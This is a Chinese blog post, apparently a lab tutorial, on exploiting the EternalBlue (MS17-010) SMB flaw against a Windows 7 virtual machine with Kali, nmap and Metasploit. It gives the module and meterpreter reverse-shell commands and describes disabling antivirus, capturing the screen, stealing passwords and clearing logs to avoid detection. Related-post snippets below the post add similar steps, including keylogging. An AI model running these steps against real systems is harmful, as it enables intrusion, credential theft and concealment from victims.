永恒之蓝漏洞攻击

已于 2022-05-17 19:20:05 修改
阅读量2k 收藏 10
点赞数 2
分类专栏: 网络 文章标签: 安全 debian 运维
于 2022-05-16 20:05:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54250695/article/details/124801851
版权

win7虚拟机        ip

kali ip:

 采用nat的桥接模式:保证kali和win7能够通信

    nmap -sS -A          win7ip    (查看攻击对象win7所开放的所有端口)

msfconsole

(启动渗透框架)  看到某个图案的这个渗透框架就运行了 

使用方法
    进入框架:msfconsole
    使用search命令查找相关漏洞: search  ms17-010
    使用use进入模块:  use exploit/windows/smb/ms17_010_eternalblue   
    使用info查看模块信息: info 
    设置攻击载荷:set payload windows/x64/meterpreter/reverse_tcp
    查看模块需要配置的参数:show options
    设置参数:set  RHOST  192.168.125.138
    攻击:exploit /  run 
    后渗透阶段 

msfconsole (查看ms17_010模块工具)

      选择攻击模块:

这里可以得到两个工具,其中auxiliary/scanner/smb/smb_ms17_010是永恒之蓝扫描模块,探测主机是否存在MS17_010漏洞

exploit/windows/smb/ms17_010_eternalblue是永恒之蓝攻击代码,一般配合使用,前者先扫描,若显示有漏洞,再进行攻击

use                  exploit/windows/smb/ms17_010_eternalblue  (使用攻击模块)

使用模块

search payload            搜索攻击载荷  payload(用来查看攻击对象返回信息)

  

设置攻击载荷    设置一个反弹信息(渗透攻击后的查看被攻击对象返回的信息)

set payload windows/x64/meterpreter/reverse_tcp 

show options (显示配置选项)

set Rhosts 攻击对象ip (设置被攻击主机地址)

 exploit   攻击  (攻击成功)

 攻击成功后可以对被攻击对象做一些操作:  如关闭杀毒软件,进入终端,窃取屏幕,获取用户密码等

   关闭杀毒软件

窃取win7虚拟机的屏幕(屏幕共享)

结果:

 窃取win7的某个用户密码

窃取密码

        渗透完成后,把需要的事干完了,清除日志(让win7发现不了)

IT_CODE.
关注
  • 2
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
系统漏洞入侵之(永恒之蓝),
qq_46258964的博客
07-02 946
-----漏洞入侵 -----MS17-010 永恒之蓝 --勒索病毒 ----利用MSF攻击框架 ----用到meterPeter 渗透工具渗透 实验环境 : 一台KALI 一台win 7 ----MS17-010 利用445端口实行入侵 只有防火墙关闭才会成功 操作步骤 1,扫描主机开放端口情况 nmap -sP 192.168.31.1-255 扫描在线主机 nmap -sS 192.168.31.109 扫描端口开放情况 nmap -O 192.168.
微软EternalBlue永恒之蓝漏洞攻击测试
我的学习笔记
02-28 4851
声明:仅供学习交流使用,个人实验笔记。排版比较懒。微软MS17-010理论:SMBv1 漏洞攻击,445端口。环境准备:攻击资源:攻击工具包 点我攻击者系统:Windows 7 Ultimate (x64) 点我受害者系统:Windows 7 Ultimate (x64) 点我,winXP,win2008,win2003均可。 点我辅助攻击用系统:kal...
永恒之蓝 ——漏洞攻击
m0_56679835的博客
03-31 390
永恒之蓝 ——漏洞攻击 永恒之蓝——漏洞攻击(命令行操作) 1.查看kali的IP地址:ifconfig 2.查看Windows的IP地址:ipconfig 3.用kali ping Windows 的主机 4.输入linux命令 su root 5.输入msfconsole 6.使用攻击武器:use auxiliary/scanner/smb/smb/_version 7.选择IP进行攻击 set rhosts 192.168.140.128 8.运行 run 9.定义线程 :set threads 20
EternalBlue【永恒之蓝漏洞详解(复现、演示、远程,淘汰了80%的网络安全面试者
最新发布
2401_83947434的博客
04-15 821
Meterpreter的功能丰富,例如添加用户、隐藏某些内容、打开shell、获取用户密码、上传和下载远程主机的文件、运行cmd.exe、捕捉屏幕、获取远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等。同时,它还提供了多种实用的功能,如实时监控、木马查杀、漏洞修复等,可以帮助用户保护电脑安全,提高使用体验。火绒安全软件则是一款以防护为主打功能的电脑安全软件,它拥有自主知识产权的新一代反病毒引擎,能够检测和分析恶意程序,提供全面的防护功能。
永恒之蓝漏洞利用攻击以及修复方法
Gjqhs的博客
12-12 6864
MS17-010(Eternal blue永恒之蓝漏洞利用+修复方法 前言 0x01 准备工作 0x02 漏洞利用 0x03 修复方案 总结 前言 提到操作系统漏洞,大家肯定听说过耳熟能详的永恒之蓝(MS17-010)了,他的爆发源于WannaCry勒索病毒的诞生。 该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的危险漏洞“EternalBlue”(永恒之蓝)进行传播 。勒索病毒肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了.
记录一次永恒之蓝(ms17-010)漏洞攻击 【后附msf常用命令】
向安全进发的博客
03-28 3634
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。#执行一个已有的模块,这里要说的是输入run后按两下tab,会列出所有的已有的脚本,常用的有。
kali下Eternalblue攻击win7
我的学习笔记
02-28 1221
参考:https://www.youtube.com/watch?v=goUVgchVGB0https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploithttps://github.com/LionSec/xerosploit(没有xerosploit可以通过这里获取)更多详细内容:...
项目8:勒索病毒之永恒之蓝漏洞利用.pdf
03-31
本文档为关于永恒之蓝病毒测试步骤以及上机实战过程,使用永恒之蓝病毒达到对靶机的控制。本文档仅作对永恒之蓝病毒研究之用,请勿非法使用,谢谢!
kb4012212-MS17-010-win7X64永恒之蓝漏洞补丁.zip
04-14
kb4012212是什么补丁 之前很多windows用户都中招了WannaCry永恒之蓝病毒,为了防患电脑被攻击电脑需要及时打上这款补丁,能够有效防止电脑被该病毒入侵,保护你的电脑。
ms17-101补丁,永恒之蓝补丁
11-25
有效防止基于msb攻击的病毒,永恒之蓝,蠕虫病毒。。。。
网络攻防——永恒之蓝
weixin_46560512的博客
03-09 2万+
主要介绍永恒之蓝程序,即 windows7的SMB协议漏洞以及相关的攻击方式。
永恒之蓝-永恒之蓝漏洞(linux)
wrypot的博客
04-02 433
读取到的键盘内容被保存在/root/.msf4/loot/20230402110004_default_192.168.132.129_host.windows.key_145354.txt。然后use auxiliary/scanner/smb/smb_ms17_010 使用载荷,这个不是攻击载荷,这个是查看的有没有漏洞的,然后show options。然后run post/windows/capture/keylog_recorderj就可以监听键盘了。搜索载荷,永恒之蓝的载荷是ms17_010。
ms17-010永恒之蓝漏洞利用,渗透同一局域网下的windows7
m0_63533079的博客
03-08 1651
利用window7存在的ms17-010漏洞进行复现演示
永恒之蓝攻击手册
ovowovo的博客
11-13 223
1、msconsole 启动工具 2、use 使用 3、set rhost 目标IP 4、run 打 就这么简单。。。
漏洞复现】永恒之蓝 ms17-010 漏洞利用 攻击手法
weixin_30640769的博客
07-16 2172
日期:2018-07-21 21:09:16 介绍:永恒之蓝利用的 ms17-010 漏洞,拿 Shell、查看文件、获取密码。 0x01、实验环境 攻击机 系统:macOS Sierra 10.12.5 IP:10.211.55.2 靶机 系统:Windows XP SP3 英文版(虚拟机) IP:10.211.55.19 激活码:HTXH6-2JJC4-CDB6C-X3...
永恒之蓝漏洞利用及攻击
热门推荐
wwl012345的博客
04-20 9万+
一、基础知识介绍: 1.何为永恒之蓝永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎...
kali 利用msf通过win7永恒之蓝漏洞获取权限
Snakewood的博客
10-06 7440
kali 利用msf通过win7永恒之蓝漏洞获取权限 老师留的信息安全课大作业:要通过漏洞来实现原本权限做不到的事 本菜狗就选了永恒之蓝漏洞来应付下,也是第一次搞这种网安类型的实验,下面正文的描述中应该有不少错误,还请各位大佬多包含!好久没有写过博客记录自己的学习了,今天顺手也记录一下。 Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索
为什么永恒之蓝漏洞监听失败
05-25
永恒之蓝漏洞是一种利用Windows SMB协议漏洞攻击方式,可以实现远程代码执行。如果你尝试使用永恒之蓝漏洞进行监听失败,可能有以下原因: 1. 监听的机器没有打开相关服务或端口。在使用永恒之蓝漏洞进行监听前,需要确保监听机器已经打开了SMB服务,并且监听的端口没有被防火墙或其他安全措施屏蔽。 2. 监听的机器已经被其他人利用永恒之蓝漏洞攻击成功。如果监听的机器已经被其他人利用永恒之蓝漏洞攻击成功,那么你将无法再次利用该漏洞进行监听。 3. 监听的机器和攻击目标不在同一个子网。永恒之蓝漏洞是一种基于局域网的攻击方式,如果你的监听机器和攻击目标不在同一个子网内,那么你将无法利用该漏洞进行监听。 总之,利用永恒之蓝漏洞进行监听需要一定的技术和经验,同时需要考虑到网络环境和安全措施等因素。建议在合法的情况下使用,切勿用于非法活动。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值